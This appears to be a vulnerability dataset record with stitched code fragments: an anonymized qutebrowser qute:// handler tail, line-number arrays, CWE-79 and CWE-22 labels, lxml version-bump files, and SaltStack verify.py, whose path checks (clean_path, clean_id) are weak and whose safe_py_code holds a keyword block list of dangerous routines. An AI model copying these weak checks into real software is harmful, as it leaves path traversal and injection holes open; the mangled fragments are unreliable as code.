VAR_31, VAR_39 = mimetypes.guess_type(VAR_23)
assert VAR_31 is not None, VAR_3
return VAR_31, VAR_42
try:
VAR_32 = utils.read_file(VAR_15)
except OSError:
VAR_43 = VAR_15.replace('.html', '.asciidoc')
if VAR_43.startswith('html/doc/'):
VAR_43 = VAR_43.replace('html/doc/', '../doc/help/')
try:
VAR_46 = utils.read_file(VAR_43)
except OSError:
VAR_46 = None
if VAR_46 is None:
raise
VAR_44 = textwrap.dedent("""
There was an VAR_8 loading the documentation!
This most likely means the documentation was not generated
properly. If you are running qutebrowser from the git repository,
please (re)run scripts/asciidoc2html.py and reload this page.
If you're running a released version this is a bug, please use
:report to report it.
Falling back to the plaintext version.
---------------------------------------------------------------
""")
return 'text/plain', (VAR_44 + VAR_46).encode('utf-8')
else:
return 'text/html', VAR_32
@CLASS_4('backend-warning')
def FUNC_13(VAR_4):
VAR_20 = jinja.render('backend-warning.html',
distribution=version.distribution(),
Distribution=version.Distribution,
version=pkg_resources.parse_version,
title="Legacy VAR_10 warning")
return 'text/html', VAR_20
def FUNC_14(VAR_3):
VAR_17 = QUrlQuery(VAR_3)
VAR_24 = VAR_17.queryItemValue('option', QUrl.FullyDecoded)
VAR_25 = VAR_17.queryItemValue('value', QUrl.FullyDecoded)
if VAR_24 == 'content.javascript.enabled' and VAR_25 == 'false':
VAR_40 = ("Refusing to disable javascript via qute://settings "
"as it needs javascript support.")
message.error(VAR_40)
return 'text/html', b'error: ' + VAR_40.encode('utf-8')
try:
config.instance.set_str(VAR_24, VAR_25, save_yaml=True)
return 'text/html', b'ok'
except configexc.Error as e:
message.error(str(e))
return 'text/html', b'error: ' + str(e).encode('utf-8')
@CLASS_4('settings')
def FUNC_15(VAR_3):
if VAR_3.path() == '/set':
return FUNC_14(VAR_3)
VAR_20 = jinja.render('settings.html', title='settings',
configdata=configdata,
confget=config.instance.get_str)
return 'text/html', VAR_20
@CLASS_4('bindings')
def FUNC_16(VAR_4):
VAR_26 = {}
VAR_27 = config.val.bindings.default
VAR_28 = set(VAR_27.keys()).union(config.val.bindings.commands)
VAR_28.remove('normal')
VAR_28 = ['normal'] + sorted(list(VAR_28))
for VAR_41 in VAR_28:
VAR_26[VAR_41] = config.key_instance.get_bindings_for(VAR_41)
VAR_20 = jinja.render('bindings.html', title='Bindings',
VAR_26=bindings)
return 'text/html', VAR_20
@CLASS_4('back')
def FUNC_17(VAR_3):
VAR_20 = jinja.render(
'back.html',
title='Suspended: ' + urllib.parse.unquote(VAR_3.fragment()))
return 'text/html', VAR_20
@CLASS_4('configdiff')
def FUNC_18(VAR_3):
if VAR_3.path() == '/old':
try:
return 'text/html', configdiff.get_diff()
except OSError as e:
VAR_8 = (b'Failed to read old config: ' +
str(e.strerror).encode('utf-8'))
return 'text/plain', VAR_8
else:
VAR_32 = config.instance.dump_userconfig().encode('utf-8')
return 'text/plain', VAR_32
@CLASS_4('pastebin-version')
def FUNC_19(VAR_4):
version.pastebin_version()
return 'text/plain', b'Paste called.'
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
26,
34,
38,
44,
45,
48,
49,
51,
52,
54,
56,
58,
59,
61,
63,
65,
66,
68,
70,
73,
78,
83,
84,
86,
88,
92,
96,
97,
99,
101,
106,
111,
116,
123,
132,
133,
136,
139,
147,
151,
157,
160,
163,
169,
174,
178,
182,
185,
187,
189,
190,
198,
204,
205,
220,
225,
226,
229,
234,
240,
243,
246,
247,
257,
263,
271,
272,
276,
285,
286,
292,
293,
299,
300,
309,
310,
314,
328,
329,
333,
345,
348,
349,
354,
355,
367,
377,
381,
385,
390,
393,
396,
400,
403,
405,
407,
408,
413,
414,
424,
425,
431,
432,
438,
445,
446,
452,
457,
458,
469,
473,
474,
478,
485,
486,
500,
501,
507,
20,
21,
22,
23,
24,
25,
55,
62,
69,
70,
71,
72,
73,
74,
75,
76,
77,
87,
88,
89,
90,
91,
100,
101,
102,
103,
104,
105,
135,
136,
137,
138,
139,
140,
141,
142,
193,
208,
228,
229,
230,
231,
232,
233,
250,
275,
276,
277,
278,
289,
296,
304,
313,
314,
315,
316,
317,
318,
332,
333,
334,
335,
336,
337,
352,
358,
417,
427,
449,
461,
477,
478,
479,
480,
489,
504,
118,
125
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
26,
35,
39,
45,
46,
49,
50,
52,
53,
55,
57,
59,
60,
62,
64,
66,
67,
69,
71,
74,
79,
84,
85,
87,
89,
93,
97,
98,
100,
102,
107,
112,
117,
124,
133,
134,
137,
140,
148,
152,
158,
161,
164,
170,
175,
179,
183,
186,
188,
190,
191,
199,
205,
206,
221,
226,
227,
230,
235,
241,
244,
248,
249,
259,
265,
273,
274,
278,
287,
288,
294,
295,
301,
302,
311,
312,
316,
330,
331,
335,
347,
350,
351,
356,
357,
369,
379,
383,
387,
392,
395,
398,
402,
405,
407,
409,
410,
415,
416,
426,
427,
433,
434,
440,
447,
448,
454,
459,
460,
471,
475,
476,
480,
487,
488,
502,
503,
509,
20,
21,
22,
23,
24,
25,
56,
63,
70,
71,
72,
73,
74,
75,
76,
77,
78,
88,
89,
90,
91,
92,
101,
102,
103,
104,
105,
106,
136,
137,
138,
139,
140,
141,
142,
143,
194,
209,
229,
230,
231,
232,
233,
234,
252,
277,
278,
279,
280,
291,
298,
306,
315,
316,
317,
318,
319,
320,
334,
335,
336,
337,
338,
339,
354,
360,
419,
429,
451,
463,
479,
480,
481,
482,
491,
506,
119,
126
] |
1CWE-79
| # this is a package
__version__ = "4.6.2"
def get_include():
"""
Returns a list of header include paths (for lxml itself, libxml2
and libxslt) needed to compile C code against lxml if it was built
with statically linked libraries.
"""
import os
lxml_path = __path__[0]
include_path = os.path.join(lxml_path, 'includes')
includes = [include_path, lxml_path]
for name in os.listdir(include_path):
path = os.path.join(include_path, name)
if os.path.isdir(path):
includes.append(path)
return includes
| # this is a package
__version__ = "4.6.3"
def get_include():
"""
Returns a list of header include paths (for lxml itself, libxml2
and libxslt) needed to compile C code against lxml if it was built
with statically linked libraries.
"""
import os
lxml_path = __path__[0]
include_path = os.path.join(lxml_path, 'includes')
includes = [include_path, lxml_path]
for name in os.listdir(include_path):
path = os.path.join(include_path, name)
if os.path.isdir(path):
includes.append(path)
return includes
| xss | {
"code": [
"__version__ = \"4.6.2\""
],
"line_no": [
3
]
} | {
"code": [
"__version__ = \"4.6.3\""
],
"line_no": [
3
]
} |
__version__ = "4.6.2"
def FUNC_0():
import os
VAR_0 = __path__[0]
VAR_1 = os.path.join(VAR_0, 'includes')
VAR_2 = [VAR_1, VAR_0]
for name in os.listdir(VAR_1):
VAR_3 = os.path.join(VAR_1, name)
if os.path.isdir(VAR_3):
VAR_2.append(VAR_3)
return VAR_2
|
__version__ = "4.6.3"
def FUNC_0():
import os
VAR_0 = __path__[0]
VAR_1 = os.path.join(VAR_0, 'includes')
VAR_2 = [VAR_1, VAR_0]
for name in os.listdir(VAR_1):
VAR_3 = os.path.join(VAR_1, name)
if os.path.isdir(VAR_3):
VAR_2.append(VAR_3)
return VAR_2
| [
1,
2,
4,
5,
16,
21,
23,
24,
7,
8,
9,
10,
11
] | [
1,
2,
4,
5,
16,
21,
23,
24,
7,
8,
9,
10,
11
] |
0CWE-22
| # -*- coding: utf-8 -*-
'''
A few checks to make sure the environment is sane
'''
from __future__ import absolute_import
# Original Author: Jeff Schroeder <jeffschroeder@computer.org>
# Import python libs
import os
import re
import sys
import stat
import errno
import socket
import logging
# Import third party libs
try:
import win32file
except ImportError:
import resource
# Import salt libs
from salt.log import is_console_configured
from salt.log.setup import LOG_LEVELS
from salt.exceptions import SaltClientError, SaltSystemExit, \
CommandExecutionError
import salt.defaults.exitcodes
import salt.utils
log = logging.getLogger(__name__)
def zmq_version():
'''
ZeroMQ python bindings >= 2.1.9 are required
'''
try:
import zmq
except Exception:
# Return True for local mode
return True
ver = zmq.__version__
# The last matched group can be None if the version
# is something like 3.1 and that will work properly
match = re.match(r'^(\d+)\.(\d+)(?:\.(\d+))?', ver)
# Fallthrough and hope for the best
if not match:
msg = "Using untested zmq python bindings version: '{0}'".format(ver)
if is_console_configured():
log.warning(msg)
else:
sys.stderr.write("WARNING {0}\n".format(msg))
return True
major, minor, point = match.groups()
if major.isdigit():
major = int(major)
if minor.isdigit():
minor = int(minor)
# point very well could be None
if point and point.isdigit():
point = int(point)
if major == 2 and minor == 1:
# zmq 2.1dev could be built against a newer libzmq
if "dev" in ver and not point:
msg = 'Using dev zmq module, please report unexpected results'
if is_console_configured():
log.warning(msg)
else:
sys.stderr.write("WARNING: {0}\n".format(msg))
return True
elif point and point >= 9:
return True
elif major > 2 or (major == 2 and minor > 1):
return True
# If all else fails, gracefully croak and warn the user
log.critical('ZeroMQ python bindings >= 2.1.9 are required')
if 'salt-master' in sys.argv[0]:
msg = ('The Salt Master is unstable using a ZeroMQ version '
'lower than 2.1.11 and requires this fix: http://lists.zeromq.'
'org/pipermail/zeromq-dev/2011-June/012094.html')
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write('CRITICAL {0}\n'.format(msg))
return False
def lookup_family(hostname):
'''
Lookup a hostname and determine its address family. The first address returned
will be AF_INET6 if the system is IPv6-enabled, and AF_INET otherwise.
'''
# If lookups fail, fall back to AF_INET sockets (and v4 addresses).
fallback = socket.AF_INET
try:
hostnames = socket.getaddrinfo(
hostname or None, None, socket.AF_UNSPEC, socket.SOCK_STREAM
)
if not hostnames:
return fallback
h = hostnames[0]
return h[0]
except socket.gaierror:
return fallback
def verify_socket(interface, pub_port, ret_port):
'''
Attempt to bind to the sockets to verify that they are available
'''
addr_family = lookup_family(interface)
for port in pub_port, ret_port:
sock = socket.socket(addr_family, socket.SOCK_STREAM)
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((interface, int(port)))
except Exception as exc:
msg = 'Unable to bind socket {0}:{1}'.format(interface, port)
if exc.args:
msg = '{0}, error: {1}'.format(msg, str(exc))
else:
msg = '{0}, this might not be a problem.'.format(msg)
msg += '; Is there another salt-master running?'
if is_console_configured():
log.warning(msg)
else:
sys.stderr.write('WARNING: {0}\n'.format(msg))
return False
finally:
sock.close()
return True
def verify_files(files, user):
'''
Verify that the named files exist and are owned by the named user
'''
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
except KeyError:
err = ('Failed to prepare the Salt environment for user '
'{0}. The user is not available.\n').format(user)
sys.stderr.write(err)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for fn_ in files:
dirname = os.path.dirname(fn_)
try:
if dirname:
try:
os.makedirs(dirname)
except OSError as err:
if err.errno != errno.EEXIST:
raise
if not os.path.isfile(fn_):
with salt.utils.fopen(fn_, 'w+') as fp_:
fp_.write('')
except IOError as err:
if os.path.isfile(dirname):
msg = 'Failed to create path {0}, is {1} a file?'.format(fn_, dirname)
raise SaltSystemExit(msg=msg)
if err.errno != errno.EACCES:
raise
msg = 'No permissions to access "{0}", are you running as the correct user?'.format(fn_)
raise SaltSystemExit(msg=msg)
except OSError as err:
msg = 'Failed to create path "{0}" - {1}'.format(fn_, err)
raise SaltSystemExit(msg=msg)
stats = os.stat(fn_)
if uid != stats.st_uid:
try:
os.chown(fn_, uid, -1)
except OSError:
pass
return True
def verify_env(dirs, user, permissive=False, pki_dir='', skip_extra=False):
'''
Verify that the named directories are in place and that the environment
can shake the salt
'''
if salt.utils.is_windows():
return win_verify_env(dirs, permissive, pki_dir, skip_extra)
import pwd # after confirming not running Windows
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
groups = salt.utils.get_gid_list(user, include_default=False)
except KeyError:
err = ('Failed to prepare the Salt environment for user '
'{0}. The user is not available.\n').format(user)
sys.stderr.write(err)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for dir_ in dirs:
if not dir_:
continue
if not os.path.isdir(dir_):
try:
cumask = os.umask(18) # 077
os.makedirs(dir_)
# If starting the process as root, chown the new dirs
if os.getuid() == 0:
os.chown(dir_, uid, gid)
os.umask(cumask)
except OSError as err:
msg = 'Failed to create directory path "{0}" - {1}\n'
sys.stderr.write(msg.format(dir_, err))
sys.exit(err.errno)
mode = os.stat(dir_)
# If starting the process as root, chown the new dirs
if os.getuid() == 0:
fmode = os.stat(dir_)
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
# Allow the directory to be owned by any group root
# belongs to if we say it's ok to be permissive
pass
else:
# chown the file for the new user
os.chown(dir_, uid, gid)
for subdir in [a for a in os.listdir(dir_) if 'jobs' not in a]:
fsubdir = os.path.join(dir_, subdir)
if '{0}jobs'.format(os.path.sep) in fsubdir:
continue
for root, dirs, files in os.walk(fsubdir):
for name in files:
if name.startswith('.'):
continue
path = os.path.join(root, name)
try:
fmode = os.stat(path)
except (IOError, OSError):
pass
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
pass
else:
# chown the file for the new user
os.chown(path, uid, gid)
for name in dirs:
path = os.path.join(root, name)
fmode = os.stat(path)
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
pass
else:
# chown the file for the new user
os.chown(path, uid, gid)
# Allow the pki dir to be 700 or 750, but nothing else.
# This prevents other users from writing out keys, while
# allowing the use-case of 3rd-party software (like django)
# to read in what it needs to integrate.
#
# If the permissions aren't correct, default to the more secure 700.
# If acls are enabled, the pki_dir needs to remain readable, this
# is still secure because the private keys are still only readable
# by the user running the master
if dir_ == pki_dir:
smode = stat.S_IMODE(mode.st_mode)
if smode != 448 and smode != 488:
if os.access(dir_, os.W_OK):
os.chmod(dir_, 448)
else:
msg = 'Unable to securely set the permissions of "{0}".'
msg = msg.format(dir_)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if skip_extra is False:
# Run the extra verification checks
zmq_version()
def check_user(user):
'''
Check user and assign process uid/gid.
'''
if salt.utils.is_windows():
return True
if user == salt.utils.get_user():
return True
import pwd # after confirming not running Windows
try:
pwuser = pwd.getpwnam(user)
try:
if hasattr(os, 'initgroups'):
os.initgroups(user, pwuser.pw_gid) # pylint: disable=minimum-python-version
else:
os.setgroups(salt.utils.get_gid_list(user, include_default=False))
os.setgid(pwuser.pw_gid)
os.setuid(pwuser.pw_uid)
# We could just reset the whole environment but let's just override
# the variables we can get from pwuser
if 'HOME' in os.environ:
os.environ['HOME'] = pwuser.pw_dir
if 'SHELL' in os.environ:
os.environ['SHELL'] = pwuser.pw_shell
for envvar in ('USER', 'LOGNAME'):
if envvar in os.environ:
os.environ[envvar] = pwuser.pw_name
except OSError:
msg = 'Salt configured to run as user "{0}" but unable to switch.'
msg = msg.format(user)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
return False
except KeyError:
msg = 'User not found: "{0}"'.format(user)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
return False
return True
def list_path_traversal(path):
'''
Returns a full list of directories leading up to, and including, a path.
So list_path_traversal('/path/to/salt') would return:
['/', '/path', '/path/to', '/path/to/salt']
in that order.
This routine has been tested on Windows systems as well.
list_path_traversal('c:\\path\\to\\salt') on Windows would return:
['c:\\', 'c:\\path', 'c:\\path\\to', 'c:\\path\\to\\salt']
'''
out = [path]
(head, tail) = os.path.split(path)
if tail == '':
# paths with trailing separators will return an empty string
out = [head]
(head, tail) = os.path.split(head)
while head != out[0]:
# loop until head is the same two consecutive times
out.insert(0, head)
(head, tail) = os.path.split(head)
return out
def check_path_traversal(path, user='root', skip_perm_errors=False):
'''
Walk from the root up to a directory and verify that the current
user has access to read each directory. This is used for making
sure a user can read all parent directories of the minion's key
before trying to go and generate a new key and raising an IOError
'''
for tpath in list_path_traversal(path):
if not os.access(tpath, os.R_OK):
msg = 'Could not access {0}.'.format(tpath)
if not os.path.exists(tpath):
msg += ' Path does not exist.'
else:
current_user = salt.utils.get_user()
# Make the error message more intelligent based on how
# the user invokes salt-call or whatever other script.
if user != current_user:
msg += ' Try running as user {0}.'.format(user)
else:
msg += ' Please give {0} read permissions.'.format(user)
# We don't need to bail on config file permission errors
# if the CLI
# process is run with the -a flag
if skip_perm_errors:
return
# Propagate this exception up so there isn't a sys.exit()
# in the middle of code that could be imported elsewhere.
raise SaltClientError(msg)
def check_max_open_files(opts):
'''
Check the number of max allowed open files and adjust if needed
'''
mof_c = opts.get('max_open_files', 100000)
if sys.platform.startswith('win'):
# Check the Windows API for more detail on this
# http://msdn.microsoft.com/en-us/library/xt874334(v=vs.71).aspx
# and the python binding http://timgolden.me.uk/pywin32-docs/win32file.html
mof_s = mof_h = win32file._getmaxstdio()
else:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
accepted_keys_dir = os.path.join(opts.get('pki_dir'), 'minions')
accepted_count = len(os.listdir(accepted_keys_dir))
log.debug(
'This salt-master instance has accepted {0} minion keys.'.format(
accepted_count
)
)
level = logging.INFO
if (accepted_count * 4) <= mof_s:
# We check for the soft value of max open files here because that's the
# value the user chose to raise to.
#
# The number of accepted keys multiplied by four(4) is lower than the
# soft value, everything should be OK
return
msg = (
'The number of accepted minion keys({0}) should be lower than 1/4 '
'of the max open files soft setting({1}). '.format(
accepted_count, mof_s
)
)
if accepted_count >= mof_s:
# This should never occur, it might have already crashed
msg += 'salt-master will crash pretty soon! '
level = logging.CRITICAL
elif (accepted_count * 2) >= mof_s:
# This is way too low, CRITICAL
level = logging.CRITICAL
elif (accepted_count * 3) >= mof_s:
level = logging.WARNING
# The accepted count is more than 3 time, WARN
elif (accepted_count * 4) >= mof_s:
level = logging.INFO
if mof_c < mof_h:
msg += ('According to the system\'s hard limit, there\'s still a '
'margin of {0} to raise the salt\'s max_open_files '
'setting. ').format(mof_h - mof_c)
msg += 'Please consider raising this value.'
log.log(level=level, msg=msg)
def clean_path(root, path, subdir=False):
'''
Accepts the root the path needs to be under and verifies that the path is
under said root. Pass in subdir=True if the path can result in a
subdirectory of the root instead of having to reside directly in the root
'''
if not os.path.isabs(root):
return ''
if not os.path.isabs(path):
path = os.path.join(root, path)
path = os.path.normpath(path)
if subdir:
if path.startswith(root):
return path
else:
if os.path.dirname(path) == os.path.normpath(root):
return path
return ''
def clean_id(id_):
'''
Returns if the passed id is clean.
'''
if re.search(r'\.\.\{sep}'.format(sep=os.sep), id_):
return False
return True
def valid_id(opts, id_):
'''
Returns if the passed id is valid
'''
try:
return bool(clean_path(opts['pki_dir'], id_)) and clean_id(id_)
except (AttributeError, KeyError, TypeError) as e:
return False
def safe_py_code(code):
'''
Check a string to see if it has any potentially unsafe routines which
could be executed via python, this routine is used to improve the
safety of modules suct as virtualenv
'''
bads = (
'import',
';',
'subprocess',
'eval',
'open',
'file',
'exec',
'input')
for bad in bads:
if code.count(bad):
return False
return True
def verify_log(opts):
'''
If an insecre logging configuration is found, show a warning
'''
level = LOG_LEVELS.get(str(opts.get('log_level')).lower(), logging.NOTSET)
if level < logging.INFO:
log.warning('Insecure logging configuration detected! Sensitive data may be logged.')
def win_verify_env(dirs, permissive=False, pki_dir='', skip_extra=False):
'''
Verify that the named directories are in place and that the environment
can shake the salt
'''
import salt.utils.win_functions
import salt.utils.win_dacl
# Get the root path directory where salt is installed
path = dirs[0]
while os.path.basename(path) not in ['salt', 'salt-tests-tmpdir']:
path, base = os.path.split(path)
# Create the root path directory if missing
if not os.path.isdir(path):
os.makedirs(path)
# Set permissions to the root path directory
current_user = salt.utils.win_functions.get_current_user()
if salt.utils.win_functions.is_admin(current_user):
try:
# Make the Administrators group owner
# Use the SID to be locale agnostic
salt.utils.win_dacl.set_owner(path, 'S-1-5-32-544')
except CommandExecutionError:
msg = 'Unable to securely set the owner of "{0}".'.format(path)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if not permissive:
try:
# Get a clean dacl by not passing an obj_name
dacl = salt.utils.win_dacl.dacl()
# Add aces to the dacl, use the GUID (locale non-specific)
# Administrators Group
dacl.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
# System
dacl.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
# Owner
dacl.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
# Save the dacl to the object
dacl.save(path, True)
except CommandExecutionError:
msg = 'Unable to securely set the permissions of ' \
'"{0}".'.format(path)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
# Create the directories
for dir_ in dirs:
if not dir_:
continue
if not os.path.isdir(dir_):
try:
os.makedirs(dir_)
except OSError as err:
msg = 'Failed to create directory path "{0}" - {1}\n'
sys.stderr.write(msg.format(dir_, err))
sys.exit(err.errno)
# The PKI dir gets its own permissions
if dir_ == pki_dir:
try:
# Make Administrators group the owner
salt.utils.win_dacl.set_owner(path, 'S-1-5-32-544')
# Give Admins, System and Owner permissions
# Get a clean dacl by not passing an obj_name
dacl = salt.utils.win_dacl.dacl()
# Add aces to the dacl, use the GUID (locale non-specific)
# Administrators Group
dacl.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
# System
dacl.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
# Owner
dacl.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
# Save the dacl to the object
dacl.save(dir_, True)
except CommandExecutionError:
msg = 'Unable to securely set the permissions of "{0}".'
msg = msg.format(dir_)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if skip_extra is False:
# Run the extra verification checks
zmq_version()
| # -*- coding: utf-8 -*-
'''
A few checks to make sure the environment is sane
'''
from __future__ import absolute_import
# Original Author: Jeff Schroeder <jeffschroeder@computer.org>
# Import python libs
import os
import re
import sys
import stat
import errno
import socket
import logging
# Import third party libs
try:
import win32file
except ImportError:
import resource
# Import salt libs
from salt.log import is_console_configured
from salt.log.setup import LOG_LEVELS
from salt.exceptions import SaltClientError, SaltSystemExit, \
CommandExecutionError
import salt.defaults.exitcodes
import salt.utils
log = logging.getLogger(__name__)
def zmq_version():
'''
ZeroMQ python bindings >= 2.1.9 are required
'''
try:
import zmq
except Exception:
# Return True for local mode
return True
ver = zmq.__version__
# The last matched group can be None if the version
# is something like 3.1 and that will work properly
match = re.match(r'^(\d+)\.(\d+)(?:\.(\d+))?', ver)
# Fallthrough and hope for the best
if not match:
msg = "Using untested zmq python bindings version: '{0}'".format(ver)
if is_console_configured():
log.warning(msg)
else:
sys.stderr.write("WARNING {0}\n".format(msg))
return True
major, minor, point = match.groups()
if major.isdigit():
major = int(major)
if minor.isdigit():
minor = int(minor)
# point very well could be None
if point and point.isdigit():
point = int(point)
if major == 2 and minor == 1:
# zmq 2.1dev could be built against a newer libzmq
if "dev" in ver and not point:
msg = 'Using dev zmq module, please report unexpected results'
if is_console_configured():
log.warning(msg)
else:
sys.stderr.write("WARNING: {0}\n".format(msg))
return True
elif point and point >= 9:
return True
elif major > 2 or (major == 2 and minor > 1):
return True
# If all else fails, gracefully croak and warn the user
log.critical('ZeroMQ python bindings >= 2.1.9 are required')
if 'salt-master' in sys.argv[0]:
msg = ('The Salt Master is unstable using a ZeroMQ version '
'lower than 2.1.11 and requires this fix: http://lists.zeromq.'
'org/pipermail/zeromq-dev/2011-June/012094.html')
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write('CRITICAL {0}\n'.format(msg))
return False
def lookup_family(hostname):
'''
Lookup a hostname and determine its address family. The first address returned
will be AF_INET6 if the system is IPv6-enabled, and AF_INET otherwise.
'''
# If lookups fail, fall back to AF_INET sockets (and v4 addresses).
fallback = socket.AF_INET
try:
hostnames = socket.getaddrinfo(
hostname or None, None, socket.AF_UNSPEC, socket.SOCK_STREAM
)
if not hostnames:
return fallback
h = hostnames[0]
return h[0]
except socket.gaierror:
return fallback
def verify_socket(interface, pub_port, ret_port):
'''
Attempt to bind to the sockets to verify that they are available
'''
addr_family = lookup_family(interface)
for port in pub_port, ret_port:
sock = socket.socket(addr_family, socket.SOCK_STREAM)
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((interface, int(port)))
except Exception as exc:
msg = 'Unable to bind socket {0}:{1}'.format(interface, port)
if exc.args:
msg = '{0}, error: {1}'.format(msg, str(exc))
else:
msg = '{0}, this might not be a problem.'.format(msg)
msg += '; Is there another salt-master running?'
if is_console_configured():
log.warning(msg)
else:
sys.stderr.write('WARNING: {0}\n'.format(msg))
return False
finally:
sock.close()
return True
def verify_files(files, user):
'''
Verify that the named files exist and are owned by the named user
'''
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
except KeyError:
err = ('Failed to prepare the Salt environment for user '
'{0}. The user is not available.\n').format(user)
sys.stderr.write(err)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for fn_ in files:
dirname = os.path.dirname(fn_)
try:
if dirname:
try:
os.makedirs(dirname)
except OSError as err:
if err.errno != errno.EEXIST:
raise
if not os.path.isfile(fn_):
with salt.utils.fopen(fn_, 'w+') as fp_:
fp_.write('')
except IOError as err:
if os.path.isfile(dirname):
msg = 'Failed to create path {0}, is {1} a file?'.format(fn_, dirname)
raise SaltSystemExit(msg=msg)
if err.errno != errno.EACCES:
raise
msg = 'No permissions to access "{0}", are you running as the correct user?'.format(fn_)
raise SaltSystemExit(msg=msg)
except OSError as err:
msg = 'Failed to create path "{0}" - {1}'.format(fn_, err)
raise SaltSystemExit(msg=msg)
stats = os.stat(fn_)
if uid != stats.st_uid:
try:
os.chown(fn_, uid, -1)
except OSError:
pass
return True
def verify_env(dirs, user, permissive=False, pki_dir='', skip_extra=False):
'''
Verify that the named directories are in place and that the environment
can shake the salt
'''
if salt.utils.is_windows():
return win_verify_env(dirs, permissive, pki_dir, skip_extra)
import pwd # after confirming not running Windows
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
groups = salt.utils.get_gid_list(user, include_default=False)
except KeyError:
err = ('Failed to prepare the Salt environment for user '
'{0}. The user is not available.\n').format(user)
sys.stderr.write(err)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for dir_ in dirs:
if not dir_:
continue
if not os.path.isdir(dir_):
try:
cumask = os.umask(18) # 077
os.makedirs(dir_)
# If starting the process as root, chown the new dirs
if os.getuid() == 0:
os.chown(dir_, uid, gid)
os.umask(cumask)
except OSError as err:
msg = 'Failed to create directory path "{0}" - {1}\n'
sys.stderr.write(msg.format(dir_, err))
sys.exit(err.errno)
mode = os.stat(dir_)
# If starting the process as root, chown the new dirs
if os.getuid() == 0:
fmode = os.stat(dir_)
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
# Allow the directory to be owned by any group root
# belongs to if we say it's ok to be permissive
pass
else:
# chown the file for the new user
os.chown(dir_, uid, gid)
for subdir in [a for a in os.listdir(dir_) if 'jobs' not in a]:
fsubdir = os.path.join(dir_, subdir)
if '{0}jobs'.format(os.path.sep) in fsubdir:
continue
for root, dirs, files in os.walk(fsubdir):
for name in files:
if name.startswith('.'):
continue
path = os.path.join(root, name)
try:
fmode = os.stat(path)
except (IOError, OSError):
pass
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
pass
else:
# chown the file for the new user
os.chown(path, uid, gid)
for name in dirs:
path = os.path.join(root, name)
fmode = os.stat(path)
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
pass
else:
# chown the file for the new user
os.chown(path, uid, gid)
# Allow the pki dir to be 700 or 750, but nothing else.
# This prevents other users from writing out keys, while
# allowing the use-case of 3rd-party software (like django)
# to read in what it needs to integrate.
#
# If the permissions aren't correct, default to the more secure 700.
# If acls are enabled, the pki_dir needs to remain readable, this
# is still secure because the private keys are still only readable
# by the user running the master
if dir_ == pki_dir:
smode = stat.S_IMODE(mode.st_mode)
if smode != 448 and smode != 488:
if os.access(dir_, os.W_OK):
os.chmod(dir_, 448)
else:
msg = 'Unable to securely set the permissions of "{0}".'
msg = msg.format(dir_)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if skip_extra is False:
# Run the extra verification checks
zmq_version()
def check_user(user):
'''
Check user and assign process uid/gid.
'''
if salt.utils.is_windows():
return True
if user == salt.utils.get_user():
return True
import pwd # after confirming not running Windows
try:
pwuser = pwd.getpwnam(user)
try:
if hasattr(os, 'initgroups'):
os.initgroups(user, pwuser.pw_gid) # pylint: disable=minimum-python-version
else:
os.setgroups(salt.utils.get_gid_list(user, include_default=False))
os.setgid(pwuser.pw_gid)
os.setuid(pwuser.pw_uid)
# We could just reset the whole environment but let's just override
# the variables we can get from pwuser
if 'HOME' in os.environ:
os.environ['HOME'] = pwuser.pw_dir
if 'SHELL' in os.environ:
os.environ['SHELL'] = pwuser.pw_shell
for envvar in ('USER', 'LOGNAME'):
if envvar in os.environ:
os.environ[envvar] = pwuser.pw_name
except OSError:
msg = 'Salt configured to run as user "{0}" but unable to switch.'
msg = msg.format(user)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
return False
except KeyError:
msg = 'User not found: "{0}"'.format(user)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
return False
return True
def list_path_traversal(path):
'''
